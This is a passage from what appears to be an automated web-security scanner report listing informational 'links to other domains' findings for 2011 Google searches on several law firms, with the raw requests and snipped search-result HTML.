<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:DfsIw2cNq2wJ:www.smithmazure.com/+Smith+Mazure&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB4QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.smithmazure.com/offices.asp" class=l onmousedown="return clk(this.href,'','','','2','','0CCAQFjAB')">Offices - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6UJmxgqwqAwJ:www.smithmazure.com/offices.asp+Smith+Mazure&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCUQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.smithmazure.com/smith_exec_member.asp?id=24" class=l onmousedown="return clk(this.href,'','','','3','','0CCcQFjAC')">David E. Mazure - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WaLRKnlnYWUJ:www.smithmazure.com/smith_exec_member.asp%3Fid%3D24+Smith+Mazure&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:WaLRKnlnYWUJ:www.smithmazure.com/smith_exec_member.asp%3Fid%3D24+Smith+Mazure&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CCwQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.smithmazure.com/news.asp" class=l onmousedown="return clk(this.href,'','','','4','','0CC0QFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9awDJjivUfgJ:www.smithmazure.com/news.asp+Smith+Mazure&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/New-York/New-York/Smith-Mazure-Director-Wilkins-Young-and-Yagerman-P-C--505262-f.html" class=l onmousedown="return clk(this.href,'','','','5','','0CDQQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0A-V6LppdvkJ:www.lawyers.com/New-York/New-York/Smith-Mazure-Director-Wilkins-Young-and-Yagerman-P-C--505262-f.html+Smith+Mazure&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDsQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.indeed.com/cmp/Smith-Mazure" class=l onmousedown="return clk(this.href,'','','','6','','0CD0QFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Q__BcYsatYoJ:www.indeed.com/cmp/Smith-Mazure+Smith+Mazure&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEIQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Smith-Mazure-Director-Wilkins/505262-law-firm-office.htm" class=l onmousedown="return clk(this.href,'','','','7','','0CEQQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sqvm1G6dYlcJ:www.martindale.com/Smith-Mazure-Director-Wilkins/505262-law-firm-office.htm+Smith+Mazure&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://national.citysearch.com/profile/38093502/somerville_nj/smith_mazure_director_wilkens.html" class=l onmousedown="return clk(this.href,'','','','8','','0CEsQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zksdB6T4tIEJ:national.citysearch.com/profile/38093502/somerville_nj/smith_mazure_director_wilkens.html+Smith+Mazure&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFAQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.yelp.com/biz/smith-mazure-director-wilkins-young-yagerman-and-tarallo-new-york" class=l onmousedown="return clk(this.href,'','','','9','','0CFEQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:77VopoqhbwYJ:www.yelp.com/biz/smith-mazure-director-wilkins-young-yagerman-and-tarallo-new-york+Smith+Mazure&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFkQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://mineola.patch.com/listings/smith-mazure-director-wilkins-young-yagerman-pc" class=l onmousedown="return clk(this.href,'','','','10','','0CFoQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zyPgiP49E-MJ:mineola.patch.com/listings/smith-mazure-director-wilkins-young-yagerman-pc+Smith+Mazure&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CF8QIDAJ')">Cached</a>
...[SNIP]...
24.30. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Perkins+Coie&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:07:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 77213

<!doctype html> <head> <title>Perkins Coie - Google Search</title> <script>window.google={kEI:"2wXMTcndFaby0gGL0Yj6Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29795,2
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Perkins+Coie&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.perkinscoie.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBwQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:IXl3nZYj16cJ:www.perkinscoie.com/+Perkins+Coie&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCEQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.perkinscoie.com/professionals/professionals.aspx" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoADAA')">Professionals</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.perkinscoie.com/Locations/locations.aspx" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoATAA')">Offices</a></div><div class=sld><a class=sla href="http://www.perkinscoie.com/careers/careers.aspx" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoAjAA')">Careers</a></div><div class=sld><a class=sla href="http://www.perkinscoie.com/firm/firm.aspx?Section=contact" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoAzAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.perkinscoie.com/services/services_grouplist.aspx" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoBDAA')">Practices</a></div><div class=sld><a class=sla href="http://www.perkinscoie.com/news/newspubs.aspx" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoBTAA')">News/Blogs</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.perkinscoie.com/firm/Firm.aspx" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoBjAA')">Firm</a></div><div class=sld><a class=sla href="http://www.perkinscoie.com/news/news_detail.aspx?news=10565afc-f914-4ae1-843e-99f72c5a08f7" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoBzAA')">Perkins Coie Opens New York Office</a>
...[SNIP]...
<h3 class="r"><a href="http://www.perkinscoie.com/careers/careers.aspx" class=l onmousedown="return clk(this.href,'','','','3','','0CDYQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nvciQLrI0pwJ:www.perkinscoie.com/careers/careers.aspx+Perkins+Coie&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.perkinscoie.com/professionals/professionals.aspx" class=l onmousedown="return clk(this.href,'','','','4','','0CD0QFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4X9KGFgpffMJ:www.perkinscoie.com/professionals/professionals.aspx+Perkins+Coie&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.perkinscoie.com/Locations/locations.aspx" class=l onmousedown="return clk(this.href,'','','','5','','0CEQQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:thbvyLnGGssJ:www.perkinscoie.com/Locations/locations.aspx+Perkins+Coie&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEkQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Perkins_Coie" class=l onmousedown="return clk(this.href,'','','','6','','0CEwQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sDJPMYP-z2YJ:en.wikipedia.org/wiki/Perkins_Coie+Perkins+Coie&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFEQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://money.cnn.com/magazines/fortune/bestcompanies/2011/snapshots/55.html" class=l onmousedown="return clk(this.href,'','','','7','','0CFMQFjAG')">100 Best Companies to Work For 2011: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Z71PZHmZi_MJ:money.cnn.com/magazines/fortune/bestcompanies/2011/snapshots/55.html+Perkins+Coie&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://abovethelaw.com/perkins-coie/" class=l onmousedown="return clk(this.href,'','','','8','','0CFoQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-vrPmGf3mXYJ:abovethelaw.com/perkins-coie/+Perkins+Coie&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CF8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.crunchbase.com/service-provider/perkins-coie" class=l onmousedown="return clk(this.href,'','','','9','','0CGEQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:pjqIl2eYuKIJ:www.crunchbase.com/service-provider/perkins-coie+Perkins+Coie&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGgQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.digestiblelaw.com/" class=l onmousedown="return clk(this.href,'','','','10','','0CGoQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mEN9PexaE58J:www.digestiblelaw.com/+Perkins+Coie&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CG8QIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP?companyId=7304" class=l onmousedown="return clk(this.href,'','','','11','','0CHEQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:xQLAlpBdFs8J:www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP%3FcompanyId%3D7304+Perkins+Coie&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:xQLAlpBdFs8J:www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP%3FcompanyId%3D7304+Perkins+Coie&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CHYQIDAK')">Cached</a>
...[SNIP]...
<div><a href="http://www.stoel.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHgQoggwCw')">Stoel Rives LLP</a>
...[SNIP]...
<div><a href="http://www.dwt.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHoQoggwDA')">Davis Wright Tremaine</a>
...[SNIP]...
<div><a href="http://www.lanepowell.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHwQoggwDQ')">Lane Powell PC</a>
...[SNIP]...
<div><a href="http://www.foster.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CH4QoggwDg')">Foster Pepper PLLC</a>
...[SNIP]...
24.31. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Nelson+Levine+deLuca+%26+Horst&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:08:07 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 73333

<!doctype html> <head> <title>Nelson Levine deLuca &amp; Horst - Google Search</title> <script>window.google={kEI:"5wXMTcX8LeXl0QGKupzkBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Nelson+Levine+deLuca+%26+Horst&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nldhlaw.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:KYPBpRnmg5AJ:www.nldhlaw.com/+Nelson+Levine+deLuca+%26+Horst&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:KYPBpRnmg5AJ:www.nldhlaw.com/+Nelson+Levine+deLuca+%26+Horst&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nldhlaw.com/CM/Custom/AttorneysByAlpha.asp" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoADAA')">Attorneys by Last Name</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nldhlaw.com/CM/Custom/Attorneys.asp" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoATAA')">Our Professionals</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nldhlaw.com/CM/Directions/DirectionsPhiladelphia.asp" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAjAA')">Blue Bell</a></div><div class=sld><a class=sla href="http://www.nldhlaw.com/CM/Recruitment/Advertisements.asp" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoAzAA')">Open Positions</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nldhlaw.com/CM/Custom/AttorneysByOffice.asp" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoBDAA')">Attorneys by Location</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nldhlaw.com/CM/Directions/DirectionsPrinceton.asp" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoBTAA')">Cherry Hill</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nldhlaw.com/CM/Custom/Firm-Overview.asp" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoBjAA')">Our Firm</a></div><div class=sld><a class=sla href="http://www.nldhlaw.com/CM/Custom/TOCArticles.asp" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoBzAA')">Articles</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nldhlaw.com/CM/Custom/AttorneysByAlpha.asp" class=l onmousedown="return clk(this.href,'','','','2','','0CCcQFjAB')">Attorneys By Name</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-PO9nxoS2lQJ:www.nldhlaw.com/CM/Custom/AttorneysByAlpha.asp+Nelson+Levine+deLuca+%26+Horst&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:-PO9nxoS2lQJ:www.nldhlaw.com/CM/Custom/AttorneysByAlpha.asp+Nelson+Levine+deLuca+%26+Horst&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CCwQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nldhlaw.com/CM/Custom/Attorneys.asp" class=l onmousedown="return clk(this.href,'','','','3','','0CC4QFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0XZhhOYIdNgJ:www.nldhlaw.com/CM/Custom/Attorneys.asp+Nelson+Levine+deLuca+%26+Horst&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:0XZhhOYIdNgJ:www.nldhlaw.com/CM/Custom/Attorneys.asp+Nelson+Levine+deLuca+%26+Horst&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CDMQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nldhlaw.com/CM/Recruitment/Advertisements.asp" class=l onmousedown="return clk(this.href,'','','','4','','0CDUQFjAD')">Open Positions - Law Firm <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zreS93CyiO8J:www.nldhlaw.com/CM/Recruitment/Advertisements.asp+Nelson+Levine+deLuca+%26+Horst&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:zreS93CyiO8J:www.nldhlaw.com/CM/Recruitment/Advertisements.asp+Nelson+Levine+deLuca+%26+Horst&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDoQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.indeed.com/cmp/Nelson-Levine-Deluca-%26-Horst-LLC" class=l onmousedown="return clk('http://www.indeed.com/cmp/Nelson-Levine-Deluca-%26-Horst-LLC','','','','5','','0CD0QFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:C1JVisAP4EwJ:www.indeed.com/cmp/Nelson-Levine-Deluca-%2526-Horst-LLC+Nelson+Levine+deLuca+%26+Horst&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:C1JVisAP4EwJ:www.indeed.com/cmp/Nelson-Levine-Deluca-%2526-Horst-LLC+Nelson+Levine+deLuca+%26+Horst&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEIQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pview.findlaw.com/cmd/view?wld_id=3133158&amp;pid=1" class=l onmousedown="return clk(this.href,'','','','6','','0CEQQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZLGYGJFR9YkJ:pview.findlaw.com/cmd/view%3Fwld_id%3D3133158%26pid%3D1+Nelson+Levine+deLuca+%26+Horst&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ZLGYGJFR9YkJ:pview.findlaw.com/cmd/view%3Fwld_id%3D3133158%26pid%3D1+Nelson+Levine+deLuca+%26+Horst&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEkQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/nelson-levine-de-luca-&amp;-horst" class=l onmousedown="return clk(this.href,'','','','7','','0CEoQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:R6iwufjNIX8J:www.linkedin.com/company/nelson-levine-de-luca-%26-horst+Nelson+Levine+deLuca+%26+Horst&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:R6iwufjNIX8J:www.linkedin.com/company/nelson-levine-de-luca-%26-horst+Nelson+Levine+deLuca+%26+Horst&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CE8QIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lexisnexis.com/community/ucc-commerciallaw/blogs/videocasts/archive/2010/01/28/nelson-levine-de-luca-_2600_-horst_1920_s-mullen-on-cyber-risk_3a00_--part-2.aspx" class=l onmousedown="return clk(this.href,'','','','8','','0CFAQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zFgz0Lw8qUwJ:www.lexisnexis.com/community/ucc-commerciallaw/blogs/videocasts/archive/2010/01/28/nelson-levine-de-luca-_2600_-horst_1920_s-mullen-on-cyber-risk_3a00_--part-2.aspx+Nelson+Levine+deLuca+%26+Horst&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:zFgz0Lw8qUwJ:www.lexisnexis.com/community/ucc-commerciallaw/blogs/videocasts/archive/2010/01/28/nelson-levine-de-luca-_2600_-horst_1920_s-mullen-on-cyber-risk_3a00_--part-2.aspx+Nelson+Levine+deLuca+%26+Horst&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CFUQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/pennsylvania/lawfirm/Nelson-Levine-de-Luca-and-Horst/baa0356b-7517-408d-b6d9-ae03cba635bf.html" class=l onmousedown="return clk(this.href,'','','','9','','0CFYQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:kDkEW0bVVdIJ:www.superlawyers.com/pennsylvania/lawfirm/Nelson-Levine-de-Luca-and-Horst/baa0356b-7517-408d-b6d9-ae03cba635bf.html+Nelson+Levine+deLuca+%26+Horst&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:kDkEW0bVVdIJ:www.superlawyers.com/pennsylvania/lawfirm/Nelson-Levine-de-Luca-and-Horst/baa0356b-7517-408d-b6d9-ae03cba635bf.html+Nelson+Levine+deLuca+%26+Horst&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CFsQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/pages/Nelson-Levine-Deluca-Horst/158626054160974" class=l onmousedown="return clk(this.href,'','','','10','','0CF0QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iBOXsrGxvCoJ:www.facebook.com/pages/Nelson-Levine-Deluca-Horst/158626054160974+Nelson+Levine+deLuca+%26+Horst&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:iBOXsrGxvCoJ:www.facebook.com/pages/Nelson-Levine-Deluca-Horst/158626054160974+Nelson+Levine+deLuca+%26+Horst&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGIQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.jmfnylaw.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CGQQoggwCg')">Jacob, Medinger & Finnegan</a>
...[SNIP]...
<div><a href="http://www.maronmarvel.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGYQoggwCw')">Maron Marvel Bradley & Anderson, PA</a>
...[SNIP]...
<div><a href="http://www.estatetaxlawyers.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CGgQoggwDA')">Nelson & Nelson</a>
...[SNIP]...
<div><a href="http://www.heartbreakkidmovie.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CGoQoggwDQ')">The Heartbreak Kid</a>
...[SNIP]...
24.32. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:07:51 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81468

